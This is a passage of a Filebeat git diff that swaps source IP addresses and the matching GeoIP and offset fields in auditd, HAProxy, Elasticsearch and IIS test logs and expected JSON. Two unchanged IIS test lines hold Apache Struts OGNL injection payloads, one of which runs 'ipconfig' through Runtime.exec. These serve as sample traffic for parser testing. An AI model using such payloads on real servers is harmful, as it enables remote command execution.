+type=CRYPTO_SESSION msg=audit(1481077253.969:489): pid=1397 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-server cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1398 suid=74 rport=63973 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=CRYPTO_SESSION msg=audit(1481077253.969:490): pid=1397 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-client cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1398 suid=74 rport=63973 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=USER_AUTH msg=audit(1481077254.134:491): pid=1397 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=pubkey_auth rport=63973 acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=USER_AUTH msg=audit(1481077254.134:492): pid=1397 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=key algo=ssh-rsa size=2048 fp=ea:4e:a7:19:2a:35:b9:0f:ee:6c:76:f3:3f:52:e4:73 rport=63973 acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
 type=SYSCALL msg=audit(1481077254.135:493): arch=c000003e syscall=59 success=yes exit=0 a0=7f01f14443ed a1=7ffc04ef9a80 a2=7f01f1647388 a3=2 items=2 ppid=1397 pid=1399 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="unix_chkpwd" exe="/usr/sbin/unix_chkpwd" subj=system_u:system_r:chkpwd_t:s0-s0:c0.c1023 key=(null)
 type=EXECVE msg=audit(1481077254.135:493): argc=3 a0="/usr/sbin/unix_chkpwd" a1="some_user" a2="chkexpiry"
 type=CWD msg=audit(1481077254.135:493):  cwd="/"
 type=PATH msg=audit(1481077254.135:493): item=0 name="/usr/sbin/unix_chkpwd" inode=16781526 dev=08:01 mode=0104755 ouid=0 ogid=0 rdev=00:00 obj=system_u:object_r:chkpwd_exec_t:s0 objtype=NORMAL
 type=PATH msg=audit(1481077254.135:493): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=16778495 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 obj=system_u:object_r:ld_so_t:s0 objtype=NORMAL
-type=USER_ACCT msg=audit(1481077254.138:494): pid=1397 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:accounting grantors=pam_unix,pam_localuser acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success'
-type=CRYPTO_KEY_USER msg=audit(1481077254.139:495): pid=1397 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1398 suid=74 rport=63973 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=USER_AUTH msg=audit(1481077254.139:496): pid=1397 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=success acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=ssh res=success'
-type=CRED_ACQ msg=audit(1481077254.140:497): pid=1397 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success'
+type=USER_ACCT msg=audit(1481077254.138:494): pid=1397 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:accounting grantors=pam_unix,pam_localuser acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success'
+type=CRYPTO_KEY_USER msg=audit(1481077254.139:495): pid=1397 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1398 suid=74 rport=63973 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=USER_AUTH msg=audit(1481077254.139:496): pid=1397 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=success acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=ssh res=success'
+type=CRED_ACQ msg=audit(1481077254.140:497): pid=1397 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success'
 type=LOGIN msg=audit(1481077254.140:498): pid=1397 uid=0 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 old-auid=4294967295 auid=1000 old-ses=4294967295 ses=4 res=1
-type=USER_ROLE_CHANGE msg=audit(1481077254.211:499): pid=1397 uid=0 auid=1000 ses=4 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='pam: default-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 selected-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success'
-type=USER_START msg=audit(1481077254.230:500): pid=1397 uid=0 auid=1000 ses=4 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:session_open grantors=pam_selinux,pam_loginuid,pam_selinux,pam_namespace,pam_keyinit,pam_keyinit,pam_limits,pam_systemd,pam_unix,pam_lastlog acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success'
-type=CRYPTO_KEY_USER msg=audit(1481077254.230:501): pid=1397 uid=0 auid=1000 ses=4 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1397 suid=0 rport=63973 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=CRYPTO_KEY_USER msg=audit(1481077254.232:502): pid=1400 uid=0 auid=1000 ses=4 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1400 suid=0  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=CRYPTO_KEY_USER msg=audit(1481077254.232:503): pid=1400 uid=0 auid=1000 ses=4 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1400 suid=0  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=CRED_ACQ msg=audit(1481077254.233:504): pid=1400 uid=0 auid=1000 ses=4 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success'
-type=USER_LOGIN msg=audit(1481077254.255:505): pid=1397 uid=0 auid=1000 ses=4 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=/dev/pts/1 res=success'
-type=USER_START msg=audit(1481077254.255:506): pid=1397 uid=0 auid=1000 ses=4 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=/dev/pts/1 res=success'
+type=USER_ROLE_CHANGE msg=audit(1481077254.211:499): pid=1397 uid=0 auid=1000 ses=4 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='pam: default-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 selected-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success'
+type=USER_START msg=audit(1481077254.230:500): pid=1397 uid=0 auid=1000 ses=4 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:session_open grantors=pam_selinux,pam_loginuid,pam_selinux,pam_namespace,pam_keyinit,pam_keyinit,pam_limits,pam_systemd,pam_unix,pam_lastlog acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success'
+type=CRYPTO_KEY_USER msg=audit(1481077254.230:501): pid=1397 uid=0 auid=1000 ses=4 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1397 suid=0 rport=63973 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=CRYPTO_KEY_USER msg=audit(1481077254.232:502): pid=1400 uid=0 auid=1000 ses=4 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1400 suid=0  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=CRYPTO_KEY_USER msg=audit(1481077254.232:503): pid=1400 uid=0 auid=1000 ses=4 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1400 suid=0  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=CRED_ACQ msg=audit(1481077254.233:504): pid=1400 uid=0 auid=1000 ses=4 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success'
+type=USER_LOGIN msg=audit(1481077254.255:505): pid=1397 uid=0 auid=1000 ses=4 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=/dev/pts/1 res=success'
+type=USER_START msg=audit(1481077254.255:506): pid=1397 uid=0 auid=1000 ses=4 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=/dev/pts/1 res=success'
 type=SYSCALL msg=audit(1481077254.258:507): arch=c000003e syscall=59 success=yes exit=0 a0=7f01f7181960 a1=7ffc04ef9280 a2=7f01f717f0c0 a3=8 items=2 ppid=1400 pid=1401 auid=1000 uid=1000 gid=1001 euid=1000 suid=1000 fsuid=1000 egid=1001 sgid=1001 fsgid=1001 tty=pts1 ses=4 comm="bash" exe="/usr/bin/bash" subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 key=(null)
 type=EXECVE msg=audit(1481077254.258:507): argc=1 a0="-bash"
 type=CWD msg=audit(1481077254.258:507):  cwd="/home/some_user"
diff --git a/filebeat/module/auditd/log/test/test.log b/filebeat/module/auditd/log/test/test.log
index b7b59daa120f..7e2b5592509d 100644
--- a/filebeat/module/auditd/log/test/test.log
+++ b/filebeat/module/auditd/log/test/test.log
@@ -1,7 +1,7 @@
 type=MAC_IPSEC_EVENT msg=audit(1485893834.891:18877201): op=SPD-delete auid=4294967295 ses=4294967295 res=1 src=192.168.2.0 src_prefixlen=24 dst=192.168.0.0 dst_prefixlen=16
 type=SYSCALL msg=audit(1485893834.891:18877199): arch=c000003e syscall=44 success=yes exit=184 a0=9 a1=7f564b2672a0 a2=b8 a3=0 items=0 ppid=1240 pid=1281 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="charon" exe=2F7573722F6C6962657865632F7374726F6E677377616E2F636861726F6E202864656C6574656429 key=(null)
 type=USER_CMD msg=audit(1489519256.192:19600329): user pid=4151 uid=497 auid=700 ses=11988 msg='cwd="/" cmd=2F7573722F6C696236342F6E6167696F732F706C7567696E732F636865636B5F617374657269736B5F7369705F7065657273202D7020323032 terminal=? res=success'
-type=CRYPTO_SESSION msg=audit(1481077041.515:406): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-server cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1299 suid=74 rport=63927 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
+type=CRYPTO_SESSION msg=audit(1481077041.515:406): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-server cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1299 suid=74 rport=63927 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
 type=TTY msg=audit(1491924063.550:1065565): tty pid=27930 uid=1000 auid=1000 ses=762 major=136 minor=0 comm="bash" data=65687F7F6563686F20746573740D76696D202F6574632F70616D2E642F70617373776F72642D617574682D61630D6D616E2070616D5F7474795F61756469740D6D616E2070616D2E640D76696D202F657463017375646F20052F70616D642E73797F7F7F7F7F2E7F6D2E642F7379092D6109617F2D61090D6D616E2070616D0D747F67726570207379737F7F7F2F7661722F6C6F09672F6D65097309207C20677265702070616D5F7474790D677265702070616D5F747479202F7661722F6C6F672F6D6573090D1B5B41017375646F200D7375646F2073750D
 type=PROCTITLE msg=audit(1451781471.394:194438): proctitle="bash"
 type=PROCTITLE msg=audit(1451781471.394:194440): proctitle=737368643A206275726E205B707269765D
diff --git a/filebeat/module/auditd/log/test/test.log-expected.json b/filebeat/module/auditd/log/test/test.log-expected.json
index a121ec916f5f..148499649881 100644
--- a/filebeat/module/auditd/log/test/test.log-expected.json
+++ b/filebeat/module/auditd/log/test/test.log-expected.json
@@ -123,7 +123,7 @@
         "event.dataset": "auditd.log",
         "event.kind": "event",
         "event.module": "auditd",
-        "event.original": "type=CRYPTO_SESSION msg=audit(1481077041.515:406): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-server cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1299 suid=74 rport=63927 laddr=10.142.0.2 lport=22  exe=\"/usr/sbin/sshd\" hostname=? addr=96.241.146.97 terminal=? res=success'",
+        "event.original": "type=CRYPTO_SESSION msg=audit(1481077041.515:406): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-server cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1299 suid=74 rport=63927 laddr=10.142.0.2 lport=22  exe=\"/usr/sbin/sshd\" hostname=? addr=216.160.83.61 terminal=? res=success'",
         "event.outcome": "success",
         "event.type": [
             "info"
@@ -134,18 +134,17 @@
         "process.executable": "/usr/sbin/sshd",
         "process.pid": 1298,
         "service.type": "auditd",
-        "source.address": "96.241.146.97",
-        "source.as.number": 701,
-        "source.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "source.geo.city_name": "Aldie",
+        "source.address": "216.160.83.61",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
         "source.geo.continent_name": "North America",
         "source.geo.country_iso_code": "US",
         "source.geo.country_name": "United States",
-        "source.geo.location.lat": 38.9637,
-        "source.geo.location.lon": -77.6099,
-        "source.geo.region_iso_code": "US-VA",
-        "source.geo.region_name": "Virginia",
-        "source.ip": "96.241.146.97",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.61",
         "user.audit.id": "4294967295",
         "user.id": "0",
         "user.saved.id": "74"
diff --git a/filebeat/module/elasticsearch/audit/test/test-audit-761.log-expected.json b/filebeat/module/elasticsearch/audit/test/test-audit-761.log-expected.json
index 7b6233381c9a..372a7d9f667a 100644
--- a/filebeat/module/elasticsearch/audit/test/test-audit-761.log-expected.json
+++ b/filebeat/module/elasticsearch/audit/test/test-audit-761.log-expected.json
@@ -1,6 +1,6 @@
 [
     {
-        "@timestamp": "2020-04-01T13:21:06.725Z",
+        "@timestamp": "2020-04-01T09:21:06.725Z",
         "elasticsearch.audit.action": "indices:data/read/mget[shard]",
         "elasticsearch.audit.indices": [
             ".logstash",
diff --git a/filebeat/module/haproxy/log/test/default.log b/filebeat/module/haproxy/log/test/default.log
index 7931d2387e2c..30f2467352d8 100644
--- a/filebeat/module/haproxy/log/test/default.log
+++ b/filebeat/module/haproxy/log/test/default.log
@@ -1 +1 @@
-Sep 20 15:42:59 1.2.3.4 haproxy[24551]: Connect from 1.2.3.4:40780 to 1.2.3.4:5000 (main/HTTP)
+Sep 20 15:42:59 1.128.3.4 haproxy[24551]: Connect from 1.128.3.4:40780 to 1.128.3.4:5000 (main/HTTP)
diff --git a/filebeat/module/haproxy/log/test/default.log-expected.json b/filebeat/module/haproxy/log/test/default.log-expected.json
index 4ffaec053364..71a2523f8450 100644
--- a/filebeat/module/haproxy/log/test/default.log-expected.json
+++ b/filebeat/module/haproxy/log/test/default.log-expected.json
@@ -1,6 +1,6 @@
 [
     {
-        "destination.ip": "1.2.3.4",
+        "destination.ip": "1.128.3.4",
         "destination.port": 5000,
         "event.category": [
             "network",
@@ -16,26 +16,20 @@
         "fileset.name": "log",
         "haproxy.frontend_name": "main",
         "haproxy.mode": "HTTP",
-        "haproxy.source": "1.2.3.4",
+        "haproxy.source": "1.128.3.4",
         "input.type": "log",
         "log.offset": 0,
         "process.name": "haproxy",
         "process.pid": 24551,
         "related.ip": [
-            "1.2.3.4",
-            "1.2.3.4"
+            "1.128.3.4",
+            "1.128.3.4"
         ],
         "service.type": "haproxy",
-        "source.address": "1.2.3.4",
-        "source.geo.city_name": "Moscow",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "RU",
-        "source.geo.country_name": "Russia",
-        "source.geo.location.lat": 55.7527,
-        "source.geo.location.lon": 37.6172,
-        "source.geo.region_iso_code": "RU-MOW",
-        "source.geo.region_name": "Moscow",
-        "source.ip": "1.2.3.4",
+        "source.address": "1.128.3.4",
+        "source.as.number": 1221,
+        "source.as.organization.name": "Telstra Pty Ltd",
+        "source.ip": "1.128.3.4",
         "source.port": 40780
     }
 ]
\ No newline at end of file
diff --git a/filebeat/module/haproxy/log/test/haproxy.log b/filebeat/module/haproxy/log/test/haproxy.log
index 1f50b581c734..9693855efa15 100644
--- a/filebeat/module/haproxy/log/test/haproxy.log
+++ b/filebeat/module/haproxy/log/test/haproxy.log
@@ -1,4 +1,4 @@
-Jul 30 09:03:52 localhost haproxy[32450]: 1.2.3.4:38862 [30/Jul/2018:09:03:52.726] incoming~ docs_microservice/docs 0/0/1/0/2 304 168 - - ---- 6/6/0/0/0 0/0 {docs.example.internal||} {|||} "GET /component---src-pages-index-js-4b15624544f97cf0bb8f.js HTTP/1.1"
+Jul 30 09:03:52 localhost haproxy[32450]: 1.128.3.4:38862 [30/Jul/2018:09:03:52.726] incoming~ docs_microservice/docs 0/0/1/0/2 304 168 - - ---- 6/6/0/0/0 0/0 {docs.example.internal||} {|||} "GET /component---src-pages-index-js-4b15624544f97cf0bb8f.js HTTP/1.1"
 May 22 02:22:22 server1 haproxy[5089]: -:22222 [22/May/2021:02:22:22.222] www-https~ myapp/node2 site.domain.com 0/0/0/18/18 200 200 - - ---- 222/222/2/0/0 0/0 "OPTIONS /api/v2/app/ HTTP/1.1"
 Jun 22 12:02:53 node2 haproxy[23034]: -:47625 [22/Jun/2021:12:02:53.473] www-https~ app/app-node2 app.domain.com 0/0/1/17/18 302 291 - - ---- 1/1/0/0/0 0/0 "GET / HTTP/1.1"
 Jun 22 12:03:01 node2 haproxy[23034]: -:47445 [22/Jun/2021:12:03:01.501] www-https~ app/node16 app.domain.com 0/0/1/55/56 200 3097 - - ---- 2/2/0/0/0 0/0 "GET /app/login/ HTTP/1.1"
diff --git a/filebeat/module/haproxy/log/test/haproxy.log-expected.json b/filebeat/module/haproxy/log/test/haproxy.log-expected.json
index 9633ab571901..a53755541609 100644
--- a/filebeat/module/haproxy/log/test/haproxy.log-expected.json
+++ b/filebeat/module/haproxy/log/test/haproxy.log-expected.json
@@ -42,19 +42,13 @@
         "process.name": "haproxy",
         "process.pid": 32450,
         "related.ip": [
-            "1.2.3.4"
+            "1.128.3.4"
         ],
         "service.type": "haproxy",
-        "source.address": "1.2.3.4",
-        "source.geo.city_name": "Moscow",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "RU",
-        "source.geo.country_name": "Russia",
-        "source.geo.location.lat": 55.7527,
-        "source.geo.location.lon": 37.6172,
-        "source.geo.region_iso_code": "RU-MOW",
-        "source.geo.region_name": "Moscow",
-        "source.ip": "1.2.3.4",
+        "source.address": "1.128.3.4",
+        "source.as.number": 1221,
+        "source.as.organization.name": "Telstra Pty Ltd",
+        "source.ip": "1.128.3.4",
         "source.port": 38862,
         "url.extension": "js",
         "url.original": "/component---src-pages-index-js-4b15624544f97cf0bb8f.js",
@@ -97,7 +91,7 @@
         "http.response.status_code": 200,
         "http.version": "1.1",
         "input.type": "log",
-        "log.offset": 260,
+        "log.offset": 262,
         "process.name": "haproxy",
         "process.pid": 5089,
         "related.hosts": [
@@ -145,7 +139,7 @@
         "http.response.status_code": 302,
         "http.version": "1.1",
         "input.type": "log",
-        "log.offset": 452,
+        "log.offset": 454,
         "process.name": "haproxy",
         "process.pid": 23034,
         "related.hosts": [
@@ -193,7 +187,7 @@
         "http.response.status_code": 200,
         "http.version": "1.1",
         "input.type": "log",
-        "log.offset": 625,
+        "log.offset": 627,
         "process.name": "haproxy",
         "process.pid": 23034,
         "related.hosts": [
@@ -241,7 +235,7 @@
         "http.response.status_code": 200,
         "http.version": "1.1",
         "input.type": "log",
-        "log.offset": 806,
+        "log.offset": 808,
         "process.name": "haproxy",
         "process.pid": 23034,
         "related.hosts": [
@@ -289,7 +283,7 @@
         "http.response.status_code": 403,
         "http.version": "1.1",
         "input.type": "log",
-        "log.offset": 983,
+        "log.offset": 985,
         "process.name": "haproxy",
         "process.pid": 23034,
         "related.hosts": [
@@ -337,7 +331,7 @@
         "http.response.status_code": 200,
         "http.version": "1.1",
         "input.type": "log",
-        "log.offset": 1163,
+        "log.offset": 1165,
         "process.name": "haproxy",
         "process.pid": 23034,
         "related.hosts": [
@@ -386,7 +380,7 @@
         "http.response.status_code": 404,
         "http.version": "1.1",
         "input.type": "log",
-        "log.offset": 1365,
+        "log.offset": 1367,
         "process.name": "haproxy",
         "process.pid": 23034,
         "related.hosts": [
@@ -435,7 +429,7 @@
         "http.response.status_code": 200,
         "http.version": "1.1",
         "input.type": "log",
-        "log.offset": 1545,
+        "log.offset": 1547,
         "process.name": "haproxy",
         "process.pid": 23034,
         "related.hosts": [
@@ -483,7 +477,7 @@
         "http.response.status_code": 404,
         "http.version": "1.1",
         "input.type": "log",
-        "log.offset": 1722,
+        "log.offset": 1724,
         "process.name": "haproxy",
         "process.pid": 23034,
         "related.hosts": [
diff --git a/filebeat/module/iis/access/test/test.log b/filebeat/module/iis/access/test/test.log
index c054eaf65578..ade544c55447 100644
--- a/filebeat/module/iis/access/test/test.log
+++ b/filebeat/module/iis/access/test/test.log
@@ -2,7 +2,7 @@
 #Version: 1.0
 #Date: 2018-01-01 08:09:10
 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
-2018-01-01 08:09:10 127.0.0.1 GET / q=100 80 - 85.181.35.98 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - 200 0 0 123
+2018-01-01 08:09:10 127.0.0.1 GET / q=100 80 - 81.2.69.143 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - 200 0 0 123
 #Software: Microsoft Internet Information Services 10.0
 #Version: 1.0
 #Date: 2018-01-01 09:10:11
@@ -12,6 +12,6 @@
 #Version: 1.0
 #Date: 2018-01-01 10:11:12
 #Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) cs-host sc-status sc-substatus sc-win32-status sc-bytes cs-bytes time-taken
-2018-01-01 10:11:12 W3SVC1 MACHINE-NAME 127.0.0.1 GET / - 80 - 85.181.35.98 HTTP/1.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36 - - example.com 200 0 0 123 456 789
+2018-01-01 10:11:12 W3SVC1 MACHINE-NAME 127.0.0.1 GET / - 80 - 81.2.69.143 HTTP/1.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36 - - example.com 200 0 0 123 456 789
 2018-12-31 12:52:33 10.44.0.136 GET / redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23webroot%3d%23req.getSession().getServletContext().getRealPath('/'),%23resp.println(%23webroot),%23resp.flush(),%23resp.close()} 443 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 401 0 0 0
 2018-12-31 12:52:33 10.44.0.136 GET /${#context['xwork.MethodAccessor.denyMethodExecution']=!(#_memberAccess['allowStaticMethodAccess']=true),(@java.lang.Runtime@getRuntime()).exec('ipconfig').waitFor()}.action - 443 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 404 0 2 0
diff --git a/filebeat/module/iis/access/test/test.log-expected.json b/filebeat/module/iis/access/test/test.log-expected.json
index 2e04f8ef2b66..d017c72260e3 100644
--- a/filebeat/module/iis/access/test/test.log-expected.json
+++ b/filebeat/module/iis/access/test/test.log-expected.json
@@ -12,7 +12,7 @@
         "event.duration": 123000000,
         "event.kind": "event",
         "event.module": "iis",
-        "event.original": "2018-01-01 08:09:10 127.0.0.1 GET / q=100 80 - 85.181.35.98 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - 200 0 0 123",
+        "event.original": "2018-01-01 08:09:10 127.0.0.1 GET / q=100 80 - 81.2.69.143 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - 200 0 0 123",
         "event.outcome": "success",
         "event.type": [
             "connection"
@@ -26,21 +26,19 @@
         "log.offset": 257,
         "related.ip": [
             "127.0.0.1",
-            "85.181.35.98"
+            "81.2.69.143"
         ],
         "service.type": "iis",
-        "source.address": "85.181.35.98",
-        "source.as.number": 6805,
-        "source.as.organization.name": "Telefonica Germany",
-        "source.geo.city_name": "Berlin",
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "DE",
-        "source.geo.country_name": "Germany",
-        "source.geo.location.lat": 52.4473,
-        "source.geo.location.lon": 13.4531,
-        "source.geo.region_iso_code": "DE-BE",
-        "source.geo.region_name": "Land Berlin",
-        "source.ip": "85.181.35.98",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "url.original": "/",
         "url.path": "/",
         "url.query": "q=100",
@@ -74,7 +72,7 @@
         "iis.access.sub_status": 0,
         "iis.access.win32_status": 0,
         "input.type": "log",
-        "log.offset": 709,
+        "log.offset": 708,
         "related.ip": [
             "127.0.0.1"
         ],
@@ -106,7 +104,7 @@
         "event.duration": 789000000,
         "event.kind": "event",
         "event.module": "iis",
